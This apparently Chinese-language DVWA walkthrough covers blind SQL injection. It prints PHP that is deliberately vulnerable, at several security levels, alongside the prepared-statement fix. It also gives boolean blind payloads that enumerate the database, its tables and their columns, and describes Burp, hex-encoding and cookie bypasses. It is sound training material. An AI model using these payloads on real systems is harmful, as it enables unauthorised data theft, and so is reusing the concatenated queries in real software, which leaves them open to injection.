首页
论坛
专栏
课程

分享:
### Low 漏洞代码: ``` <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> ``` 直接拼接sql语句没有任何处理,查询结果只有 “User ID exists in the database.” 和 “User ID is MISSING from the database.” 漏洞利用: 1、判断注入是字符型还是数字型 输入:1' and 1=1;# 输出:User ID exists in the database. 输入:1' and 1=2;# 输出:User ID is MISSING from the database. 是字符型注入。 2、猜解当前数据库信息 猜解数据库长度: 1' and length(database())=4;# 数据库名的长度是4位。 使用二分法猜解数据库名: 1' and ascii(substr(database(),1,1)) > 100;# User ID is MISSING from the database. 1' and ascii(substr(database(),1,1)) < 100;# User ID is MISSING from the database. 判断出数据库名的第一个ascii字符为100,就是d,以此按照以上方法可以猜解出数据库名dvwa。 3、猜解表信息 猜解表数: 1' and (select count(table_name) from information_schema.tables where table_schema=database())=1; # 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2; # 判断出数据库中存在两个表 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9; # 判断出第一个表名的长度为9 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<110; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103; # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103; # 判断出第一个表名的第一个字母是g 重复以上步骤,猜解出两个表名分别为 guestbook,users 4、猜解字段名 猜解字段的数量: 1' and (select count(column_name) from information_schema.columns where table_name='users')=8; # 输出:User ID exists in the database. 猜解字段名: 1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7; # 可知users表中第一个字段长度是7位,使用上面的二分法可猜解出字段名。 ........ ### Medium 漏洞代码: ``` <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } //mysql_close(); } ?> ``` 后端使用了post获取ID,且前端使用了下拉来限制输入,使用burp抓包工具可以绕过。 mysqli_real_escape_string函数转义 x00,n,r,,’,”,x1a特殊字符,含有这些特殊字符的payload可以用16进制编码绕过。 ### High 漏洞代码: ``` <?php if( isset( $_COOKIE[ 'id' ] ) ) { // Get input $id = $_COOKIE[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?> ``` 后端使用了cookie获取ID,limit限制现实结果只有1个,rand函数扰乱基于时间的盲注。 使用burp修改cookie参数中的ID值为payload注入,加入#字符注释limit即可绕过限制结果为1的问题。 ### Impossible 漏洞代码: ``` <?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); // Get results if( $data->rowCount() == 1 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } } } // Generate Anti-CSRF token generateSessionToken(); ?> ``` checkToken防止csrf漏洞, PDO使得数据和代码分离,保证了安全性。

上一篇 :
下一篇 :
讨论 (0)
沪ICP备16048531号-1
沪公网安备 31011502006611号